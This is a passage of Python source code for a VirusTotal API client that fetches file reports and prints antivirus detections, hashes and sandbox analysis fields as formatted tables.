file_path.endswith('.json'): try: log = open(file_path, 'r').read() jdata = json.loads(log) return jdata except TypeError: print('\n[!] 
Check your json dump file\n')


def get_detections(scans, manual_engines=False, **kwargs):
    plist = [[]]
    if manual_engines:
        engines = manual_engines
        if engines == list():
            return
        elif isinstance(engines, six.string_types) and engines.find(',') != -1:
            engines = engines.split(',')
        elif isinstance(engines, six.string_types):
            engines = [engines]
        # lower case for easier comparison
        engines = [eng.lower().strip() for eng in engines]
    short_list = list()
    for engine in list(scans.keys()):
        engine = engine.strip()
        if engine.lower() in engines and scans[engine]:
            short_list.append(engine)
            plist.append([
                engine,
                scans[engine]['result'],
                scans[engine]['engine_version'] if 'engine_version' in scans[engine] and scans[engine]['engine_version'] else ' -- ',
                scans[engine]['engine_update'] if 'engine_update' in scans[engine] and scans[engine]['engine_update'] else ' -- '
            ])
    if plist != [[]]:
        av_size, result_size, version = get_adequate_table_sizes(scans, True, short_list)
        pretty_print_special(plist,
                             ['Vendor name', 'Result', 'Version', 'Last Update'],
                             [av_size, result_size, version, 11],
                             ['r', 'l', 'l', 'c'],
                             kwargs.get('email_template')
                             )


def dump_csv(filename, scans):
    f = open('VTDL{0}.csv'.format(filename), 'w')
    writer = csv.writer(f, delimiter=',')
    writer.writerow(('Vendor name', 'Detected', 'Result', 'Version', 'Last Update'))
    for x in sorted(scans):
        writer.writerow([
            x,
            'True' if scans[x]['detected'] else 'False',
            scans[x]['result'] if scans[x]['result'] else ' -- ',
            scans[x]['version'] if 'version' in scans[x] and scans[x]['version'] else ' -- ',
            scans[x]['update'] if 'update' in scans[x] and scans[x]['update'] else ' -- '
        ])
    f.close()
    print('\n\tCSV file dumped as: VTDL{0}.csv'.format(filename))


def parse_report(jdata, **kwargs):
    filename = ''
    if _check_error(jdata) is False:
        if not kwargs.get('not_exit'):
            return False
    else:
        _check_error(jdata)
        return
    if jdata.get('scan_date'):
        print('\nScanned on : \n\t{0}'.format(jdata.get('scan_date')))
    if jdata.get('total'):
        print('\nDetections:\n\t {positives}/{total} Positives/Total'.format(positives=jdata.get('positives'), total=jdata.get('total')))
    if kwargs.get('url_report'):
        if jdata.get('url'):
            print('\nScanned url :\n\t {url}'.format(url=jdata.get('url')))
    else:
        if not kwargs.get('verbose') and 'scans' in jdata:
            get_detections(jdata['scans'], **kwargs)
        if 'md5' in jdata:
            print('\n\tResults for MD5 : {0}'.format(jdata.get('md5')))
        if 'sha1' in jdata:
            print('\tResults for SHA1 : {0}'.format(jdata.get('sha1')))
        if 'sha256' in jdata:
            print('\tResults for SHA256 : {0}'.format(jdata.get('sha256')))
    if kwargs.get('verbose') == True and jdata.get('scans'):
        print('\nVerbose VirusTotal Information Output:')
        plist = [[]]
        for x in sorted(jdata.get('scans')):
            if jdata['scans'][x].get('detected'):
                plist.append([
                    x,
                    'True',
                    jdata['scans'][x]['result'] if jdata['scans'][x]['result'] else ' -- ',
                    jdata['scans'][x]['engine_version'] if 'engine_version' in jdata['scans'][x] and jdata['scans'][x]['engine_version'] else ' -- ',
                    jdata['scans'][x]['engine_update'] if 'engine_update' in jdata['scans'][x] and jdata['scans'][x]['engine_update'] else ' -- '
                ])
        av_size, result_size, version = get_adequate_table_sizes(jdata['scans'])
        if version == 9:
            version_align = 'c'
        else:
            version_align = 'l'
        if plist != [[]]:
            pretty_print_special(plist,
                                 ['Vendor name', 'Detected', 'Result', 'Version', 'Last Update'],
                                 [av_size, 9, result_size, version, 12],
                                 ['r', 'c', 'l', version_align, 'c'],
                                 kwargs.get('email_template')
                                 )
            del plist
    if kwargs.get('dump') is True:
        jsondump(jdata, jdata.get('sha1'))
    if kwargs.get('csv') is True:
        filename = jdata.get('scan_id')
        dump_csv(filename, jdata.get('scans'))
    if jdata.get('permalink'):
        print("\n\tPermanent Link : {0}\n".format(jdata.get('permalink')))
    return True


# Static variable decorator for function
def static_var(varname, value):
    def decorate(func):
        setattr(func, varname, value)
        return func
    return decorate


# Track how many times we issue a request
@static_var("counter", 0)
# Track when the first request was sent
@static_var("start_time", 0)
def get_response(url, method="get", **kwargs):
    # Set on first request
    if get_response.start_time == 0:
        get_response.start_time = time.time()
    # Increment every request
    get_response.counter += 1
    jdata = ''
    response = ''
    kwargs['timeout'] = req_timeout
    kwargs["headers"] = {"x-apikey": apikey}
    while True:
        try:
            response = getattr(requests, method)(url, **kwargs)
        except requests.exceptions.ConnectionError:
            print('\n[!] Some network connection error happened, check your internet connection, or it can be a VT API server side issue\n')
            return {}, ''
        if response:
            if response.status_code == 403:
                private_api_access_error()
            if response.status_code != 204 and hasattr(response, 'json'):
                try:
                    jdata = response.json()
                except Exception as e:
                    # fall back to the attribute for very old requests releases
                    # where .json was exposed as a property instead of a method
                    jdata = response.json
                break
        else:
            return {}, ''
        # Determine minimum time we need to wait for limit to reset
        wait_time = 59 - int(time.time() - get_response.start_time)
        if wait_time < 0:
            wait_time = 60
        print("Reached per minute limit of {0:d}; waiting {1:d} seconds\n".format(get_response.counter, wait_time))
        time.sleep(wait_time)
        # Reset static vars
        get_response.counter = 0
        get_response.start_time = 0
    return jdata, response


def _check_error(jdata):
    error = False
    if 'error' in jdata:
        print('[!] Code: {} - Description: {}'.format(jdata['error']['code'], jdata['error']['description']))
        error = True
    return error


class PRINTER(object):

    def print_key(self, key, indent='\n', separator='[+]'):
        try:
            print('{0}{1} {2}'.format(indent, separator, key.capitalize().replace('_', ' ').replace('-', ' ')))
        except Exception as e:
            print(e)

    # key:value
    def simple_print(self, block, keys):
        for key in keys:
            if block.get(key) and block[key]:
                self.print_key(key, indent=' ')
                if isinstance(block.get(key), list):
                    print('\t', '\n\t'.join(block.get(key)))
                else:
                    print('\t', block.get(key))

    # key:[]
    def list_print(self, block, keys):
        for key in keys:
            if block.get(key) and block[key]:
                self.print_key(key)
                print('\t', '\n\t'.join(block.get(key)))

    def _print_complex_dict(self, jdata, key, **kwargs):
        self.print_key(key)
        plist = [[]]
        for jdata_part in jdata[key]:
            if isinstance(jdata_part, six.string_types):
                plist.append([jdata_part, jdata[key][jdata_part]])
            elif isinstance(jdata_part, dict):
                plist.append(jdata_part.values())
        key_s, key_v = get_sizes(jdata[key])
        pretty_print_special(plist, ['Name', 'Value'], [key_s, key_v], ['r', 'l'], kwargs.get('email_template'))
        del plist

    # key:{subkey:[]}
    def dict_list_print(self, block, keys):
        for key in keys:
            if block.get(key) and block[key]:
                self.print_key(key)
                if isinstance(block.get(key), list):
                    for sub_list in block.get(key):
                        if isinstance(sub_list, list):
                            print('\n\t', '\n\t'.join([str(part) for part in sub_list]))
                        elif isinstance(sub_list, dict):
                            for sub_key, sub_value in list(sub_list.items()):
                                print('\t', sub_key, sub_value)
                            print('\n')
                elif isinstance(block.get(key), dict):
                    for sub_key in block.get(key, []):
                        if block[key].get(sub_key, {}):
                            self.print_key(sub_key)
                            for ssub_dict in block[key].get(sub_key, {}):
                                print('\n')
                                for ssub_key, ssub_value in list(ssub_dict.items()):
                                    print('\t',
ssub_key, ssub_value) # key:{subkey:{}} def dict_print(self, block, keys): for key in keys: if block.get(key, []): self.print_key(key) for sub_key, value in list(block[key].items()): if isinstance(value, list): print('\n', sub_key, '\n\t', '\n\t'.join(value)) else: print('\n', sub_key, '\n\t', value) class vtAPI(PRINTER): def __init__(self): super(PRINTER, self).__init__() self.params = dict() self.base = 'https://www.virustotal.com/api/v3/{0}' def __aux_search(self, url, page_limit): """ Aux function to grab more than 300 hashes """ info = list() count = 1 while True: try: print("[+] Getting page {} result".format(count)) if page_limit >= count: jdata, response = get_response(url, params=self.params) count += 1 if jdata and 'data' in jdata: info += jdata['data'] if jdata['links']['next'] != response.url: url = jdata['links']['next'] else: break else: break except Exception as e: print(e) count += 1 if page_limit >= count: break return info def _parse_aux(self, block, **kwargs): basic_file_info_list = ( 'md5', 'sha1', 'sha256', 'ssdeep', 'authentihash', 'vhash', 'magic', 'type_description',\ 'type_tag', 'creation_date', 'times_submitted', 'size', 'total_votes', 'unique_sources',\ 'meaningful_name', 'reputation', ) basic_info = dict() to_time = ('first_submission_date', 'last_submission_date', 'last_analysis_date', 'last_modification_date') [basic_info.update({key:datetime.fromtimestamp(block[key]).strftime('%Y-%m-%d %H:%M:%S')}) for key in to_time if key in block] [basic_info.update({key:block[key]}) for key in basic_file_info_list if key in block] self._print_complex_dict({'basic':basic_info}, 'basic', **{'email_template':True}) for key in ('names', 'tags'): if block.get(key): self.list_print(block, [key]) """ behaviour trid """ for key in ('signature_info', 'exiftool', 'last_analysis_stats'): if block.get(key): self._print_complex_dict(block, key, **{'email_template':True}) get_detections(block['last_analysis_results'], manual_engines=block['last_analysis_results'].keys(), **kwargs) def getReport(self, *args, **kwargs): """ A md5/sha1/sha256 hash will retrieve the most recent report on a given sample. You may also specify a scan_id (sha256-timestamp as returned by the file upload API) to access a specific report. You can also specify a CSV list made up of a combination of hashes and scan_ids (up to 4 items or 25 if you have private api with the standard request rate), this allows you to perform a batch request with one single call. 
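
        A minimal usage sketch (illustrative only, not part of the original code:
        the hash below is a placeholder and a configured module-level apikey is
        assumed):

            vt = vtAPI()
            vt.getReport(value=['<sha256 hash>'], verbose=True)

        Passing dump=True additionally writes the raw JSON answer to disk via
        jsondump().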
""" return_json = dict() jdatas = list() result, name = is_file(kwargs.get('value')) if result: jdatas = load_file(name) if isinstance(jdatas, list): jdatas = jdatas else: jdatas = [jdatas] kwargs['dump'] = False else: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] for hashes_report in kwargs.get('value'): if os.path.isfile(hashes_report): print('\nCalculating hash for:', hashes_report) hashes_report = hashlib.sha256(open(hashes_report, 'rb').read()).hexdigest() #ToDo all options # https://developers.virustotal.com/v3.0/reference#intelligence-search if (kwargs.get('search_intelligence') or 'search_intelligence' in args): self.params['query'] = [hashes_report] url = self.base.format('intelligence/search') else: self.params['resource'] = hashes_report url = self.base.format('files/{}'.format(hashes_report)) jdata, response = get_response(url, params=self.params) if 'next' in jdata.get('data', dict).get('links', dict()) and kwargs.get('search_intelligence_limit', 1) > 1: info = self.__aux_search(jdata['data']['links']['next'], kwargs['search_intelligence_limit']) jdata['data'] += info if kwargs.get('return_raw'): return jdata jdatas.append(jdata) if isinstance(jdatas, list) and jdatas == []: if kwargs.get('return_raw'): pass else: print('Nothing found') return if not isinstance(jdatas, list): jdatas = [jdatas] for jdata in jdatas: if isinstance(jdata, dict): if _check_error(jdata): continue if jdata.get('data'): if kwargs.get('dump'): jsondump(jdata, name) if kwargs.get('not_exit'): return False if kwargs.get('search_intelligence') or 'search_intelligence' in args: if kwargs.get('return_json') and (kwargs.get('hashes') or 'hashes' in args): return_json['hashes'] = [block['attributes']['sha256'] for block in jdata['data']] else: print('[+] Matched hash(es):') for block in jdata['data']: print('{} - FS:{} - LS:{}'.format(block['attributes']['sha256'], \ datetime.fromtimestamp(block['attributes']['first_submission_date']).strftime('%Y-%m-%d %H:%M:%S'), \ datetime.fromtimestamp(block['attributes']['last_analysis_date']).strftime('%Y-%m-%d %H:%M:%S')) ) if kwargs.get('verbose') or kwargs.get('allinfo'): self._parse_aux(block['attributes'], **kwargs) print("\n\n") if kwargs.get('download'): kwargs.update({'value': block['attributes']['sha256'], 'download':'file'}) self.download(**kwargs) else: self._parse_aux(jdata['data']['attributes'], **kwargs) if kwargs.get('allinfo'): pass #ToDo remove """ if kwargs.get('verbose'): #print(jdata) basic_file_info_list = ( 'md5', 'sha1', 'sha256', 'ssdeep', 'scan_date', 'first_seen', 'last_seen', 'times_submitted', 'scan_id', 'harmless_votes', 'community_reputation', 'malicious_votes', ) self.simple_print(jdata, basic_file_info_list) self.list_print(jdata, ['submission_names']) if jdata.get('ITW_urls') and ((kwargs.get('ITW_urls') or 'ITW_urls' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['ITW_urls'] = jdata.get('ITW_urls') else: self.list_print(jdata, ['ITW_urls']) if kwargs.get('verbose'): file_info_list = ( 'type', 'size', 'tags', 'unique_sources', ) self.simple_print(jdata, file_info_list) simple_list = ( 'magic', 'first_seen_itw', 'trendmicro-housecall-heuristic', 'deepguard', 'unique_sources', 'trid', 'pe-timestamp' ) list_list = ( 'compressed_parents', ) dict_keys = ( 'pe-overlay', 'pe-resource-langs', 'pe-resource-types', 'pe-resource-list', ) dict_list_keys = ( 'sections', ) if 
kwargs.get('verbose'): self.simple_print(jdata['additional_info'], simple_list) self.list_print(jdata['additional_info'], list_list) self.dict_print(jdata['additional_info'], dict_keys) self.dict_list_print(jdata['additional_info'], dict_list_keys) if jdata['additional_info'].get('rombioscheck') and ((kwargs.get('rombioscheck_info') or 'rombioscheck_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['rombioscheck'] = jdata['additional_info'].get('rombioscheck') else: print('\n[+] RomBiosCheck:') print('\t') # this removes code duplication simple_list = ( 'contained_hash', 'executable_file', 'firmware_volume_count', 'max_tree_level', 'format', 'raw_objects', 'raw_sections', 'section_count', 'vhash', 'win32_file', ) list_keys = ( 'acpi_tables', 'nvar_variable_names', 'tags' ) double_list = ( 'apple_data', 'manufacturer_candidates' ) self.simple_print(jdata['additional_info']['rombioscheck'], simple_list) self.list_print(jdata['additional_info']['rombioscheck'], list_keys) for key in double_list: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for block in jdata['additional_info']['rombioscheck'].get(key): print('\t', block[0], ':', block[1]) simple_dict = ( 'smbios_data', 'biosinformation', 'systeminformation' ) for key in simple_dict: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) plist = [[]] for sub_key, value in jdata['additional_info']['rombioscheck'].get(key).items(): if isinstance(value, list): value = '\n'.join(value) plist.append([sub_key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist dict_keys = ( 'option_roms', 'certs' ) for key in dict_keys: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for block in jdata['additional_info']['rombioscheck'].get(key, {}): plist = [[]] for key, value in block.items(): if isinstance(value, list): value = '\n'.join(value) plist.append([key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist complex_dict = ( 'win32children', 'children' ) for key in complex_dict: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for cert in jdata['additional_info']['rombioscheck'].get(key, {}): plist = [[]] for key, value in cert.items(): if key == 'detection_ratio': value = '/'.join([str(num) for num in value]) if key in ('tags', 'imports'): value = '\n'.join(value) if key == 'certs': certs = list() for certificates in value: for sub_key, sub_value in certificates.items(): if sub_key == 'subject': certs.append('{0}: {1}\n\n----------------'.format(sub_key, sub_value)) else: certs.append('{0}: {1}'.format(sub_key, sub_value)) value = '\n'.join(certs) plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], [20, 64], ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('rombios_generator') and ((kwargs.get('rombios_generator_info') or 'rombios_generator_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['rombios_generator'] = jdata['additional_info'].get('rombios_generator') else: print('\n[+] RomBios Generator:') dict_keys = ( 'source', ) for key in dict_keys: if jdata['additional_info']['rombios_generator'].get(key) and 
kwargs.get('verbose'): self.print_key(key) plist = [[]] for key, value in jdata['additional_info']['rombios_generator'].get(key, {}).items(): if isinstance(value, list): value = '\n'.join(value) plist.append([key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['rombios_generator'].get('diff') and kwargs.get('verbose'): pass if jdata['additional_info'].get('debcheck') and ((kwargs.get('debcheck_info') or 'debcheck_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['debcheck'] = jdata['additional_info'].get('debcheck') else: print('\n[+] DebCheck') simple_list = ( 'vhash', 'tags' ) dict_list = ( 'structural_metadata', 'control_metadata', 'control_scripts' ) complicated_dict_list = ( 'children', ) for key in simple_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) if isinstance(jdata['additional_info']['debcheck'].get(key), list): print('\t', '\n\t'.join(jdata['additional_info']['debcheck'].get(key))) elif isinstance(jdata['additional_info']['debcheck'].get(key), six.string_types): print('\t', jdata['additional_info']['debcheck'].get(key)) for key in dict_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) plist = [[]] for sub_key, value in jdata['additional_info']['debcheck'][key].items(): plist.append([sub_key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist for key in complicated_dict_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) for block in jdata['additional_info']['debcheck'].get(key, {}): for sub_key, sub_value in block.items(): if sub_key == 'detection_ratio': sub_value = '/'.join([str(ssub) for ssub in sub_value]) print('\t', sub_key, ':', sub_value) print('\n') if jdata['additional_info'].get('androguard') and ((kwargs.get('androidguard_info') or 'androidguard_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['androguard'] = jdata['additional_info'].get('androguard') else: print('\n[+] AndroidGuard') simple_list = ( 'AndroguardVersion', 'AndroidApplication', 'AndroidApplicationError', 'AndroidApplicationInfo', 'AndroidVersionCode', 'AndroidVersionName', 'VTAndroidInfo', 'Main Activity', 'MinSdkVersion', 'TargetSdkVersion', 'Package', 'SourceFile', ) list_list = ( 'Libraries', 'Activities', 'StringsInformation' ) dict_list = ( 'Permissions', 'RiskIndicator', ) self.simple_print(jdata['additional_info']['androguard'], simple_list) self.list_print(jdata['additional_info']['androguard'], list_list) self.dict_print(jdata['additional_info']['androguard'], dict_list) #certificates info cert_list = ( 'Subject', 'validto', 'serialnumber', 'thumbprint', 'validfrom', 'Issuer' ) if jdata['additional_info']['androguard'].get('certificate'): for key in cert_list: if jdata['additional_info']['androguard']['certificate'].get(key): self.print_key(key) if key in ('Subject', 'Issuer'): for sub_key, sub_value in jdata['additional_info']['androguard']['certificate'].get(key).items(): print('\t', sub_key, ':', sub_value) else: print('\t', jdata['additional_info']['androguard']['certificate'].get(key)) if jdata['additional_info']['androguard'].get('intent-filters'): print('\n[+]', 'Intent-filters') for key in jdata['additional_info']['androguard'].get('intent-filters'): print('\t', key) for sub_key in 
jdata['additional_info']['androguard']['intent-filters'].get(key, {}): print('\n\t\t', sub_key) for ssub_key in jdata['additional_info']['androguard']['intent-filters'][key].get(sub_key): print('\n\t\t\t', ssub_key) print('\n\t\t\t\t', '\n\t\t\t\t'.join(jdata['additional_info']['androguard']['intent-filters'][key][sub_key].get(ssub_key))) if jdata.get('email_parents') and kwargs.get('verbose'): print('\n[+] Email parents:') for email in jdata['email_parents']: print('\t{email}'.format(email=email)) if jdata['additional_info'].get('referers') and kwargs.get('verbose'): print('\n[+] Referers:') print('\t', '\n\t'.join(jdata['additional_info']['referers'])) # IDS, splited to be easily getted throw imported vt as library ids = ( 'suricata', 'snort' ) for key in ids: if jdata['additional_info'].get(key) and (kwargs.get(key) or key in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json[key] = jdata['additional_info'].get(key) else: if jdata['additional_info'].get(key, ''): self.print_key(key) for rule in jdata['additional_info'].get(key): print('\nRule:', rule) print('\tAlert\n\t\t', jdata['additional_info'][key][rule]['alert']) print('\tClassification\n\t\t', jdata['additional_info'][key][rule]['classification']) print('\tDescription:') for desc in jdata['additional_info'][key][rule]['destinations']: print('\t\t', desc) if jdata['additional_info'].get('traffic_inspection') and (kwargs.get('traffic_inspection') or 'traffic_inspection' in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json['traffic_inspection'] = jdata['additional_info'].get('traffic_inspection') else: if jdata['additional_info'].get('traffic_inspection'): print('\n[+] Traffic inspection') for proto in jdata['additional_info'].get('traffic_inspection'): print('\tProtocol:', proto) for block in jdata['additional_info'].get('traffic_inspection')[proto]: plist = [[]] for key, value in block.items(): plist.append([key, str(value)]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('wireshark') and (kwargs.get('wireshark_info') or 'wireshark_info' in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json['wireshark'] = jdata['additional_info'].get('wireshark') else: if jdata['additional_info'].get('wireshark', {}): print('\n[+] Wireshark:') if jdata['additional_info'].get('wireshark', {}).get('pcap'): plist = [[]] for key, value in jdata['additional_info'].get('wireshark', {}).get('pcap').items(): plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('wireshark', {}).get('dns'): print('\n[+] DNS') plist = [[]] key_s, value_s = get_sizes(jdata['additional_info'].get('wireshark')) for domain in jdata['additional_info'].get('wireshark').get('dns'): plist.append([domain[0], '\n\t'.join(domain[1])]) if plist != [[]]: pretty_print_special(plist, ['Domain', 'IP(s)'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('behaviour-v1'): dict_keys = ( 'mutex', ) if kwargs.get('verbose'): self.dict_list_print(jdata['additional_info']['behaviour-v1'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('tags'): print('\n[+] Tags:') for tag in jdata['additional_info']['behaviour-v1'].get('tags'): print('\t', tag) if jdata['additional_info']['behaviour-v1'].get('dropped_files') and kwargs.get('verbose'): 
print('\n[+] Dropped files:') plist = [[]] for files in jdata['additional_info']['behaviour-v1'].get('dropped_files'): plist.append([files.get('hash'), files.get('filename')]) if plist != [[]]: pretty_print_special(plist, ['Hash(sha256?)', 'Filename'], [64, 50], ['c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('network', {}) and kwargs.get('verbose'): print('\n[+] Network') network_list = ( 'tcp', 'udp' ) for key in network_list: if jdata['additional_info']['behaviour-v1']['network'].get(key): plist = [[]] [plist.append([ip]) for ip in jdata['additional_info']['behaviour-v1']['network'].get(key)] pretty_print_special(plist, [key.upper()], False, False, kwargs.get('email_template')) # ToDo hosts if jdata['additional_info']['behaviour-v1']['network'].get('dns') and kwargs.get('verbose'): print('\n[+] DNS:') plist = [[]] for block in jdata['additional_info']['behaviour-v1']['network'].get('dns'): plist.append([block.get('ip'), block.get('hostname')]) pretty_print_special(plist, ['Ip', 'Hostname'], False, False, kwargs.get('email_template')) #if jdata['additional_info']['behaviour-v1']['network'].get('http'): # print '\n[+] HTTP:', jdata['additional_info']['behaviour-v1']['network'].get('http') if jdata['additional_info']['behaviour-v1'].get('codesign') and kwargs.get('verbose'): print('\n[+] Codesign:\n\t',jdata['additional_info']['behaviour-v1'].get('codesign').replace('\n', '\n\t')) if jdata['additional_info']['behaviour-v1'].get('process') and kwargs.get('verbose'): dict_keys = ( 'injected', 'shellcmds', 'terminated', 'tree' ) print('\n[+] Process') self.dict_list_print(jdata['additional_info']['behaviour-v1']['process'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('registry') and kwargs.get('verbose'): dict_keys = ( 'deleted', 'set' ) #print '\n[+] Registry' #self.dict_list_print(jdata['additional_info']['behaviour-v1']['registry'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('windows') and kwargs.get('verbose'): dict_keys = ( 'windows', 'runtime-dlls', 'hooking', 'filesystem' ) self.dict_list_print(jdata['additional_info']['behaviour-v1'], dict_keys) if kwargs.get('verbose'): simple_list = ( 'knockknock', 'tun_time', 'internal_tags', 'num_screenshots', 'version' ) self.simple_print(jdata['additional_info']['behaviour-v1'], simple_list) if jdata['additional_info']['behaviour-v1'].get('signals') and kwargs.get('verbose'): print('\n[+] Signals:') plist = [[]] for signals in jdata['additional_info']['behaviour-v1'].get('signals'): plist.append( [signals.get('cmd'), signals.get('target'), signals.get('signo'), signals.get('pid'), signals.get('walltimestamp'), signals.get('execname')]) if plist != [[]]: pretty_print_special(plist, ['CMD', 'Target', 'Signo', 'PID', 'WallTimeStamp', 'ExecName'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('filesystem') and kwargs.get('verbose'): print('\n[+] Filesystem:') if jdata['additional_info']['behaviour-v1']['filesystem'].get('opened'): plist = [[]] for fs_open in jdata['additional_info']['behaviour-v1']['filesystem'].get('opened'): plist.append( [fs_open.get('success'), fs_open.get('execname'), fs_open.get('path')]) if plist != [[]]: pretty_print_special(plist, ['Success', 'ExecName', 'Path'], [8, 20, 80], ['c', 'c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('output'): print('\n[+] Output:', jdata['additional_info']['behaviour-v1'].get('output')) if 
jdata['additional_info'].get('sigcheck') and kwargs.get('verbose'): print('\n[+] PE signature block:') plist = [[]] for sig in jdata['additional_info']['sigcheck']: if isinstance(jdata['additional_info']['sigcheck'][sig], list): self.print_key(sig) for data in jdata['additional_info']['sigcheck'][sig]: sub_plist = [[]] for key in data.keys(): sub_plist.append([key, data[key]]) pretty_print_special(sub_plist, ['Name', 'Value'], False, False, kwargs.get('email_template')) del sub_plist else: plist.append( [sig, jdata['additional_info']['sigcheck'][sig].encode('utf-8')] # texttable unicode fail ) pretty_print_special(plist, ['Name', 'Value'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info'].get('exiftool') and kwargs.get('verbose'): self.dict_print(jdata['additional_info'], ['exiftool']) if jdata['additional_info'].get('imports') and kwargs.get('verbose'): self.dict_print(jdata['additional_info'], ['imports']) if jdata['additional_info'].get('dmgcheck') and kwargs.get('verbose'): print('\n[+] dmgCheck:') if jdata['additional_info']['dmgcheck'].get('plst_keys'): print('\n[+] plst_keys:') for key in jdata['additional_info']['dmgcheck']['plst_keys']: print('\t{}'.format(key)) if jdata['additional_info']['dmgcheck'].get('plst'): plist = [[]] for plst in jdata['additional_info']['dmgcheck']['plst']: plist.append( [plst.get('attributes'), plst.get('name')]) if plist != [[]]: pretty_print_special(plist, ['Attributes', 'Name'], False, False, kwargs.get('email_template')) del plist dmgcheck_list = ( 'xml_offset', 'xml_length', 'data_fork_offset', 'running_data_fork_offset', 'rsrc_fork_offset', ) if jdata['additional_info']['dmgcheck'].get('resourcefork_keys'): print('\n[+] resourcefork keys:') for key in jdata['additional_info']['dmgcheck']['resourcefork_keys']: print('\t', key) if jdata['additional_info']['dmgcheck'].get('blkx'): print('\n[+] blkx:') plist = [[]] for blkx in jdata['additional_info']['dmgcheck']['blkx']: plist.append( [blkx.get('attributes'), blkx.get('name')]) if plist != [[]]: pretty_print_special(plist, ['Attributes', 'Name'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info']['dmgcheck'].get('iso') and jdata['additional_info']['dmgcheck']['iso'].get('volume_data', {}): print('\n[+] Volume data') plist = [[]] for key, value in jdata['additional_info']['dmgcheck']['iso'].get('volume_data', {}).items(): plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], [22, 80], ['r', 'l', ], kwargs.get('email_template')) del plist hfs_dict_list = ( 'executables', 'bundles', 'main_executable', ) # ToDo # dmgcheck.iso.unreadable_files for pattern in ('hfs', 'iso'): for key in hfs_dict_list: if jdata['additional_info']['dmgcheck'].get(pattern): if jdata['additional_info']['dmgcheck'][pattern].get(key): self.print_key(key) plist = [[]] if key in ('main_executable', 'volume_data'): jdata['additional_info']['dmgcheck'][pattern][key] = [jdata['additional_info']['dmgcheck'][pattern][key]] for executables in jdata['additional_info']['dmgcheck'][pattern].get(key, ''): detection = executables.get('detection_ratio') detection = '{0}:{1}'.format(detection[0], detection[1]) plist.append( [detection, executables.get('id'), executables.get('size', '-'), executables.get('sha256'), executables.get('path')]) if plist != [[]]: pretty_print_special(plist, ['Detection', 'Id', 'Size', 'sha256', 'Path'], [10, 10, 10, 64, 50], ['c', 'c', 'c', 'c', 'l'], kwargs.get('email_template')) del plist hfs_list = ( 'num_files', 
'unreadable_files', 'dmg' ) for key in hfs_list: if jdata['additional_info']['dmgcheck'][pattern].get(key): self.print_key(key) print('\t', jdata['additional_info']['dmgcheck'][pattern][key]) if jdata['additional_info']['dmgcheck'][pattern].get('info_plist', ''): print('\n[+] Info plist: ') for key, value in jdata['additional_info']['dmgcheck'][pattern]['info_plist'].items(): if isinstance(value, dict): print('\t', key, ':') for subkey, subvalue in value.items(): print('\t\t', subkey, ':', subvalue) else: print('\t', key, ':', value) if jdata['additional_info'].get('compressedview') and ((kwargs.get('compressedview') or 'compressedview' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['compressedview'] = jdata['additional_info']['compressedview']['compressedview'] else: print('\n[+] Compressed view:') if jdata['additional_info']['compressedview'].get('children') and ((kwargs.get('children') or 'children' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['compresedview_children'] = jdata['additional_info']['compressedview']['children'] else: compressedview_list = ('datetime', 'detection_ratio', 'filename', 'sha256', 'size', 'type') for child in jdata['additional_info']['compressedview'].get('children'): print('\n') for key in compressedview_list: if child.get(key): self.print_key(key, indent='', separator='') if key == 'detection_ratio': print('\t{0}/{1}'.format(child[key][0], child[key][1])) elif key == 'filename': try: print('\t', child[key]) except: try: print('\t', child[key].encode('utf-8')) except: print('\t[-]Name decode error') else: print('\t', child.get(key)) if jdata['additional_info']['compressedview'].get('extensions'): print('\n[+] Extensions:') for ext in jdata['additional_info']['compressedview']['extensions']: print('\t', ext, jdata['additional_info']['compressedview']['extensions'][ext]) if jdata['additional_info']['compressedview'].get('file_types'): print('\n[+] FileTypes') for file_types in jdata['additional_info']['compressedview']['file_types']: print('\t' ,file_types, 